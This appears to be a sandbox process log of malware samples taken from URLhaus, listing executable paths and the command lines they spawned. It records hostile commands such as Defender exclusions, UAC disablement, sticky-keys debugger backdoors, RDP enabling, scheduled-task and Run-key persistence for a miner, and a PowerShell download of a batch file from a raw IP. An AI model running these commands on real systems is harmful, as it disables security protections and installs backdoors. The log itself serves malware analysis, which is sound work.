"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe"

C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /T 3

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat

"C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\UrlHausFiles\paste.ps1"

C:\Users\Admin\Downloads\UrlHausFiles\ew.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe" "SearchUII.exe" ENABLE

C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe" /VERYSILENT /SUPPRESSMSGBOXES

C:\Users\Admin\AppData\Local\Temp\is-OCRHC.tmp\ClientServices.tmp

"C:\Users\Admin\AppData\Local\Temp\is-OCRHC.tmp\ClientServices.tmp" /SL5="$5031A,965278,203776,C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe" /VERYSILENT /SUPPRESSMSGBOXES

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\blockHost\mQaBLuUaoydrtjCUEEo9RzhnLMIcPb9fRdfVdNsoFovUVH.bat" "

C:\Windows\SysWOW64\regsvr32.exe

"regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\HollowSwallow.dll"

C:\blockHost\msServerFontDriver.exe

"C:\blockHost/msServerFontDriver.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\Admin\AppData\Roaming\HollowSwallow.dll' }) { exit 0 } else { exit 1 }"

C:\Users\Admin\Downloads\UrlHausFiles\9402.tmp.exe

"C:\Users\Admin\Downloads\UrlHausFiles\9402.tmp.exe"

C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe

"C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe"

C:\Users\Admin\AppData\Local\palladiums\translucently.exe

"C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4DAE.tmp\4DAF.tmp\4DB0.bat C:\Users\Admin\Downloads\UrlHausFiles\9402.tmp.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')

C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe

"C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Quzg8YkU0P.bat"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 7876 -ip 7876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7876 -s 536

C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe

"C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe"

C:\Users\Admin\Downloads\UrlHausFiles\hfs.exe

"C:\Users\Admin\Downloads\UrlHausFiles\hfs.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\cmd.cmd" "

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\wow.exe

"C:\Users\Admin\Downloads\UrlHausFiles\wow.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\System32\GameBarPresenceWriter.exe

"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer

C:\Users\Admin\Downloads\UrlHausFiles\sound.exe

"C:\Users\Admin\Downloads\UrlHausFiles\sound.exe"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Users\Admin\Downloads\UrlHausFiles\AllNew.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AllNew.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd

C:\Users\Admin\Downloads\UrlHausFiles\logon.exe

"C:\Users\Admin\Downloads\UrlHausFiles\logon.exe"

C:\Users\Admin\Downloads\UrlHausFiles\build.exe

"C:\Users\Admin\Downloads\UrlHausFiles\build.exe"

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\mi.exe

"C:\Users\Admin\Downloads\UrlHausFiles\mi.exe"

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\add.bat" "

C:\Users\Admin\Downloads\UrlHausFiles\IMG001.exe

"C:\Users\Admin\Downloads\UrlHausFiles\IMG001.exe"

C:\Users\Admin\AppData\Local\Temp\6174.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\6174.tmp.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\UrlHausFiles\'

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe

C:\Users\Admin\Downloads\UrlHausFiles\1188%E7%83%88%E7%84%B0.exe

"C:\Users\Admin\Downloads\UrlHausFiles\1188%E7%83%88%E7%84%B0.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im tftp.exe

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\c2.exe

"C:\Users\Admin\Downloads\UrlHausFiles\c2.exe"

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"

C:\Windows\SYSTEM32\notepad.exe

notepad.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService

C:\Users\Admin\Downloads\UrlHausFiles\Ammyy.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Ammyy.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 6728 -ip 6728

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6728 -s 1308

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\UrlHausFiles\networks.ps1"

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe"

C:\Windows\SysWOW64\svchost.exe

"C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1640 -ip 1640

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\Admin\AppData\Roaming\HollowSwallow.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{A216281A-61ED-46A4-F26C-4347B2F31750}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 1372

C:\Users\Admin\Downloads\UrlHausFiles\SharpHound.exe

"C:\Users\Admin\Downloads\UrlHausFiles\SharpHound.exe"

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'AutoUpdate.exe'

C:\Users\Admin\Downloads\UrlHausFiles\client.exe

"C:\Users\Admin\Downloads\UrlHausFiles\client.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\stail.exe

"C:\Users\Admin\Downloads\UrlHausFiles\stail.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\Downloads\UrlHausFiles\1krecrypted')

C:\Users\Admin\AppData\Local\Temp\tftp.exe

"C:\Users\Admin\AppData\Local\Temp\tftp.exe"

C:\Users\Admin\AppData\Local\Temp\is-7IIHE.tmp\stail.tmp

"C:\Users\Admin\AppData\Local\Temp\is-7IIHE.tmp\stail.tmp" /SL5="$204B8,3299853,54272,C:\Users\Admin\Downloads\UrlHausFiles\stail.exe"

C:\Users\Admin\Downloads\UrlHausFiles\4XYFk9r.exe

"C:\Users\Admin\Downloads\UrlHausFiles\4XYFk9r.exe"

C:\Program Files (x86)\seetrol\client\SeetrolClient.exe

"C:\Program Files (x86)\seetrol\client\SeetrolClient.exe"

C:\Users\Admin\Downloads\UrlHausFiles\readme.exe

"C:\Users\Admin\Downloads\UrlHausFiles\readme.exe"

C:\Users\Admin\AppData\Local\Temp\10000331101\Office2024.exe

"C:\Users\Admin\AppData\Local\Temp\10000331101\Office2024.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1640 -ip 1640

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" pause powerful_player_1242

C:\Users\Admin\AppData\Local\Powerful Player 3.0.1.11\powerfulplayer3.exe

"C:\Users\Admin\AppData\Local\Powerful Player 3.0.1.11\powerfulplayer3.exe" -i

C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe

"C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fDenyTSConnections /t REG_DWORD /d "00000000"

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 pause powerful_player_1242

C:\Windows\SysWOW64\ipconfig.exe

"C:\Windows\System32\ipconfig.exe" /flushdns

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3504 -ip 3504

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 3504 -ip 3504

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\967E.tmp\968F.tmp\9690.bat C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3504 -s 1488

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3504 -s 1520

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x320 0x4a8

C:\Windows\System32\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\UrlHausFiles\Deccastationers.msi"

C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe

C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fAllowUnsolicited /t REG_DWORD /d "00000001"

C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe

"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.funletters.net/readme.htm

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffcc45b46f8,0x7ffcc45b4708,0x7ffcc45b4718

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'NGUBAPK.exe'

C:\Users\Admin\AppData\Local\Temp\10000341101\stail.exe

"C:\Users\Admin\AppData\Local\Temp\10000341101\stail.exe"

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v UserAuthentication /t REG_DWORD /d "00000000"

C:\Users\Admin\AppData\Local\Temp\is-5DRQB.tmp\stail.tmp

"C:\Users\Admin\AppData\Local\Temp\is-5DRQB.tmp\stail.tmp" /SL5="$503AA,3299853,54272,C:\Users\Admin\AppData\Local\Temp\10000341101\stail.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,8535423453841574020,11898543562643417661,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,8535423453841574020,11898543562643417661,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,8535423453841574020,11898543562643417661,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:8

C:\Windows\system32\mshta.exe

mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE","goto :target","","runas",1)(window.close)

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im tftp.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8535423453841574020,11898543562643417661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3168 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8535423453841574020,11898543562643417661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:1

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /f /v SecurityLayer /t REG_DWORD /d "00000001"

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4704 -ip 4704

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 1276

C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE

"C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE" goto :target

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B38C.tmp\B38D.tmp\B38E.bat C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE goto :target"

C:\Windows\system32\msg.exe

msg * virus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8535423453841574020,11898543562643417661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4576 /prefetch:1

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"

C:\Windows\system32\reg.exe

reg query HKEY_CLASSES_ROOT\http\shell\open\command

C:\Windows\system32\msg.exe

msg * virus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8535423453841574020,11898543562643417661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5148 /prefetch:1

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 4726' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network4726Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcc45b46f8,0x7ffcc45b4708,0x7ffcc45b4718

C:\Windows\system32\attrib.exe

attrib +s +h d:\net

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\Downloads\UrlHausFiles\build.exe" & rd /s /q "C:\ProgramData\BKECAEBGHDAE" & exit

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8535423453841574020,11898543562643417661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\DOWNLO~1\URLHAU~1\PowerShell.exe

powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,8535423453841574020,11898543562643417661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\tftp.exe

"C:\Users\Admin\AppData\Local\Temp\tftp.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\random.exe

"C:\Users\Admin\Downloads\UrlHausFiles\random.exe"

C:\Windows\system32\schtasks.exe

SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f

C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe"

C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe

"C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe"

C:\Users\Admin\Downloads\UrlHausFiles\cryyy.exe

"C:\Users\Admin\Downloads\UrlHausFiles\cryyy.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\app64.exe

"C:\Users\Admin\Downloads\UrlHausFiles\app64.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\kreon.exe"

C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe

"C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ

C:\Windows\SysWOW64\powercfg.exe

powercfg /CHANGE -standby-timeout-ac 0

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

C:\Windows\system32\cmd.exe

cmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\kreon.exe"

C:\Users\Admin\Downloads\UrlHausFiles\abc.exe

"C:\Users\Admin\Downloads\UrlHausFiles\abc.exe"

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe

"C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe"

C:\Windows\SysWOW64\powercfg.exe

powercfg /CHANGE -hibernate-timeout-ac 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3236 -ip 3236

C:\Users\Admin\Downloads\UrlHausFiles\MJPVgHw.exe

"C:\Users\Admin\Downloads\UrlHausFiles\MJPVgHw.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3236 -s 336

C:\Windows\system32\svchost.exe

"C:\Windows\system32\svchost.exe"

C:\Windows\system32\audiodg.exe

"C:\Windows\system32\audiodg.exe"

C:\Windows\system32\msiexec.exe

"C:\Windows\system32\msiexec.exe"

C:\Users\Admin\Downloads\UrlHausFiles\ew.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"

C:\Windows\system32\PING.EXE

ping localhost -n 1

C:\Windows\SysWOW64\powercfg.exe

Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000

C:\Users\Admin\Downloads\UrlHausFiles\three-daisies.exe

